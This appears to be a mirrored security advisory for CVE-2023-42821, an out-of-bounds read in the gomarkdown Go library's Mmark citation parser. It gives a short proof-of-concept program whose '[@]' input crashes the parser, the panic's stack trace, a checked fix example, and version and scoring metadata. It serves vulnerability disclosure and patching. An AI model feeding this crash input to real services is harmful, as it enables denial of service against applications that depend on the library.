Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tOXhxLTZoMmotNjVyMs4AA2Ar
Markdown vulnerable to Out-of-bounds Read while parsing citations
Summary
Parsing malformed markdown input with a parser that has the parser.Mmark extension enabled can result in an out-of-bounds read.
Details
To exploit the vulnerability, the parser must have the parser.Mmark extension set. The panic occurs in citation.go at line 69, when the parser tries to access an element beyond the length of the slice.
PoC
package main

import (
	"github.com/gomarkdown/markdown"
	"github.com/gomarkdown/markdown/parser"
)

func main() {
	ext := parser.CommonExtensions |
		parser.Attributes |
		parser.OrderedListStart |
		parser.SuperSubscript |
		parser.Mmark

	p := parser.NewWithExtensions(ext)
	inp := []byte("[@]")
	markdown.ToHTML(inp, p, nil)
}
$ go run main.go
panic: runtime error: index out of range [1] with length 1
goroutine 1 [running]:
github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/citation.go:69 +0x544
github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:308 +0x1c0
github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:38 +0xb8
github.com/gomarkdown/markdown/parser.(*Parser).Parse.func1({0x102d87f48?, 0x14000076180}, 0x0?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:307 +0x8c
github.com/gomarkdown/markdown/ast.NodeVisitorFunc.Visit(0x140000106e0?, {0x102d87f48?, 0x14000076180?}, 0x68?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:574 +0x38
github.com/gomarkdown/markdown/ast.Walk({0x102d87f48, 0x14000076180}, {0x102d87348, 0x140000106e0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:546 +0x58
github.com/gomarkdown/markdown/ast.Walk({0x102d877b0, 0x14000076120}, {0x102d87348, 0x140000106e0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:557 +0x144
github.com/gomarkdown/markdown/ast.WalkFunc(...)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:580
github.com/gomarkdown/markdown/parser.(*Parser).Parse(0x14000152000, {0x1400000e3f0?, 0x0?, 0x0?})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:304 +0x16c
github.com/gomarkdown/markdown.Parse({0x1400000e3f0?, 0x3f?, 0x14000141e38?}, 0x102c6b43c?)
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:53 +0x6c
github.com/gomarkdown/markdown.ToHTML({0x1400000e3f0?, 0x0?, 0x60?}, 0x0?, {0x0, 0x0})
/Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:77 +0x30
main.main()
/Users/demon/tools/markdown_cve_poc/main.go:17 +0x5c
exit status 2
Impact
Denial of Service / panic
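The failure mode described under Details, as an added example that is not gomarkdown's code: a simplified model of a citation scanner that reads the byte after '@' unchecked, next to a length-checked version and a recover() wrapper that turns the panic into an error. The function names, the sample inputs and the '!', '?', '-' modifier handling (taken from Mmark citation syntax) are assumptions made for illustration.

```go
package main

import (
	"bytes"
	"fmt"
)

// citeKeyUnchecked models the bug class only (hypothetical, not gomarkdown's
// code): it reads the byte after '@' without checking that one exists.
func citeKeyUnchecked(data []byte) []byte {
	inner := bytes.TrimSpace(bytes.Trim(data, "[]"))
	if len(inner) == 0 || inner[0] != '@' {
		return nil
	}
	start := 1
	if c := inner[1]; c == '!' || c == '?' || c == '-' { // "[@]" panics here
		start = 2
	}
	return inner[start:]
}

// citeKeyChecked is the same logic with the length check in place.
func citeKeyChecked(data []byte) []byte {
	inner := bytes.TrimSpace(bytes.Trim(data, "[]"))
	if len(inner) < 2 || inner[0] != '@' {
		return nil // a bare "@" carries no citation key
	}
	start := 1
	if c := inner[1]; c == '!' || c == '?' || c == '-' {
		start = 2
	}
	return inner[start:]
}

// safely converts a runtime panic in a parse step into an ordinary error.
func safely(parse func([]byte) []byte, in []byte) (out []byte, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("parser panic: %v", r)
		}
	}()
	return parse(in), nil
}

func main() {
	for _, in := range []string{"[@RFC2119]", "[@!RFC2119]", "[@]"} { // constructed inputs
		_, err := safely(citeKeyUnchecked, []byte(in))
		fmt.Printf("%-14q unchecked err=%v checked=%q\n", in, err, citeKeyChecked([]byte(in)))
	}
}
```

A recover() wrapper of this kind only contains a panic raised in the same goroutine, so it has to sit directly around the call that parses untrusted markdown.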
Permalink: https://github.com/advisories/GHSA-m9xq-6h2j-65r2
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tOXhxLTZoMmotNjVyMs4AA2Ar
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 1 year ago
Updated: about 1 year ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Percentage: 0.00097
EPSS Percentile: 0.41523
Identifiers: GHSA-m9xq-6h2j-65r2, CVE-2023-42821
References:
- https://github.com/gomarkdown/markdown/security/advisories/GHSA-m9xq-6h2j-65r2
- https://nvd.nist.gov/vuln/detail/CVE-2023-42821
- https://github.com/gomarkdown/markdown/commit/14b16010c2ee7ff33a940a541d993bd043a88940
- https://github.com/gomarkdown/markdown/blob/7478c230c7cd3e7328803d89abe591d0b61c41e4/parser/citation.go#L69
- https://github.com/advisories/GHSA-m9xq-6h2j-65r2
Blast Radius: 22.5
Affected Packages
go:github.com/gomarkdown/markdown
Dependent packages: 1,252
Dependent repositories: 1,009
Downloads:
Affected Version Ranges: < 0.0.0-20230922105210-14b16010c2ee
Fixed in: 0.0.0-20230922105210-14b16010c2ee
All affected versions: 0.0.0-20190912180731-281270bc6d83, 0.0.0-20191123064959-2c17d62f5098, 0.0.0-20200820230800-3724143f5294, 0.0.0-20200824053859-8c8b3816f167, 0.0.0-20201113031856-722100d81a8e, 0.0.0-20210514010506-3b9f47219fe7, 0.0.0-20210918222519-d0f88e9eb6e5, 0.0.0-20220310201231-552c6011c0b8, 0.0.0-20220607163217-45f7c050e2d1, 0.0.0-20220627144906-e9a81102ebeb, 0.0.0-20220731190611-dcdaee8e7a53, 0.0.0-20220825072242-90efaac57fb4, 0.0.0-20220829112121-a940a8f5bc05, 0.0.0-20221013030248-663e2500819c, 0.0.0-20230309071026-b9a42cb9b4a0, 0.0.0-20230309071408-e444975d2bd9, 0.0.0-20230309071618-d640a388c6c5, 0.0.0-20230309072206-3418bbfe2069, 0.0.0-20230309073835-0cff362ab5d9, 0.0.0-20230309081604-09e1818272d6, 0.0.0-20230309083625-de14518eadd0, 0.0.0-20230309092824-3238e54d4819, 0.0.0-20230310225216-e92f2877bcce, 0.0.0-20230311184306-fc0ebebbe9af, 0.0.0-20230311185209-fc3f3a72c23a, 0.0.0-20230311204719-630fdb2a10ae, 0.0.0-20230311221154-ee98e42be4e5, 0.0.0-20230312001534-ae1a42e38ef1, 0.0.0-20230312174038-279c45774906, 0.0.0-20230312215031-f439dd2b4436, 0.0.0-20230313173142-2ced44d5b584, 0.0.0-20230321044648-154b583bceb3, 0.0.0-20230321061146-9af27b67c68e, 0.0.0-20230322035321-5f17e2f50624, 0.0.0-20230322041520-c84983bdbf2a, 0.0.0-20230711084535-11b03c0ae6d6, 0.0.0-20230714230225-84ecad09a30a, 0.0.0-20230715013231-a46a3be917c7, 0.0.0-20230716120725-531d2d74bc12, 0.0.0-20230912175223-14b07df9d538, 0.0.0-20230916125811-7478c230c7cd
All unaffected versions: